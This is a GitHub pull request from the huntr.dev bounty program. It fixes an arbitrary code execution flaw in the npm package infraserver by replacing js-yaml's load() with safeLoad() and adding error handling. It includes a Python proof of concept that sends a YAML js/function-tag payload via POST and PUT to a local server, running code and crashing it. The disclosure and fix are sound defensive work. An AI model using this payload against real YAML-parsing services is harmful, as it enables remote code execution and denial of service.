Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security Fix for Arbitrary Code Execution - huntr.dev #17

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open

Security Fix for Arbitrary Code Execution - huntr.dev #17

wants to merge 3 commits into from

Conversation

huntr-helper
Copy link

https://huntr.dev/users/alromh87 has fixed the Arbitrary Code Execution vulnerability 馃敤. alromh87 has been awarded $25 for fixing the vulnerability through the huntr bug bounty program 馃挼. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#2
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/npm/infraserver/1/README.md

User Comments:

馃搳 Metadata *

infraserver is a data server, this package are vulnerable to Arbitrary Code Execution due to the default usage of the function load() of the package js-yaml instead of its secure replacement, safeLoad().

It took my a little while to implement the POC properly, but now its cleanly solved

Bounty URL: https://www.huntr.dev/bounties/1-npm-infraserver

鈿欙笍 Description *

I replaced the use of yaml.load() with yaml.safeLoad() and added handling of error if loading fails.

馃捇 Technical Description *

Two vulnerable endpoints where found on infra POST and PUT

Code execution is avoided by using yamlLoad(), but just replacing the function (as the other PR) malicious payload would trigger DoS, so I avoided that by using try ... catch.

馃悰 Proof of Concept (PoC) *

  1. Download Infra
    git clone https://github.com/xuemen/Infra
  2. Enter directory
    cd infra
  3. Start server
    node server/Infra.data.js
  4. Create poc.py
#!/bin/python
# -*- coding: utf-8 -*-

import requests

print ('Post request -----------------------')
r = requests.post('http://localhost:46372', data="hasOwnProperty: !<tag:yaml.org,2002:js/function> ' () => {console.log(`This is code executed on the server, started from payload`)}' ")
print (r)
print (r.text)

print ('\n\n\n')

print ('Put request ------------------------')
r = requests.put('http://localhost:46372', data="hasOwnProperty: !<tag:yaml.org,2002:js/function> ' () => {console.log(`This is code executed on the server, started from payload`)}' ")
print (r)
print (r.text)
  1. Execute poc
    python poc.py
  2. Server will execute injected code printing This is code executed on the server, started from payload to console and then die causing DoS

Before fix

Captura de pantalla de 2020-09-11 19-28-53

Only repleacing use of function (incomplete fix)

Captura de pantalla de 2020-09-11 19-36-52

馃敟 Proof of Fix (PoF) *

After fix no code is executed and server stays online

Captura de pantalla de 2020-09-11 19-42-52

馃憤 User Acceptance Testing (UAT)

Functionality unafected

Captura de pantalla de 2020-09-11 20-27-42

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@huntr-helper @alromh87 @JamieSlome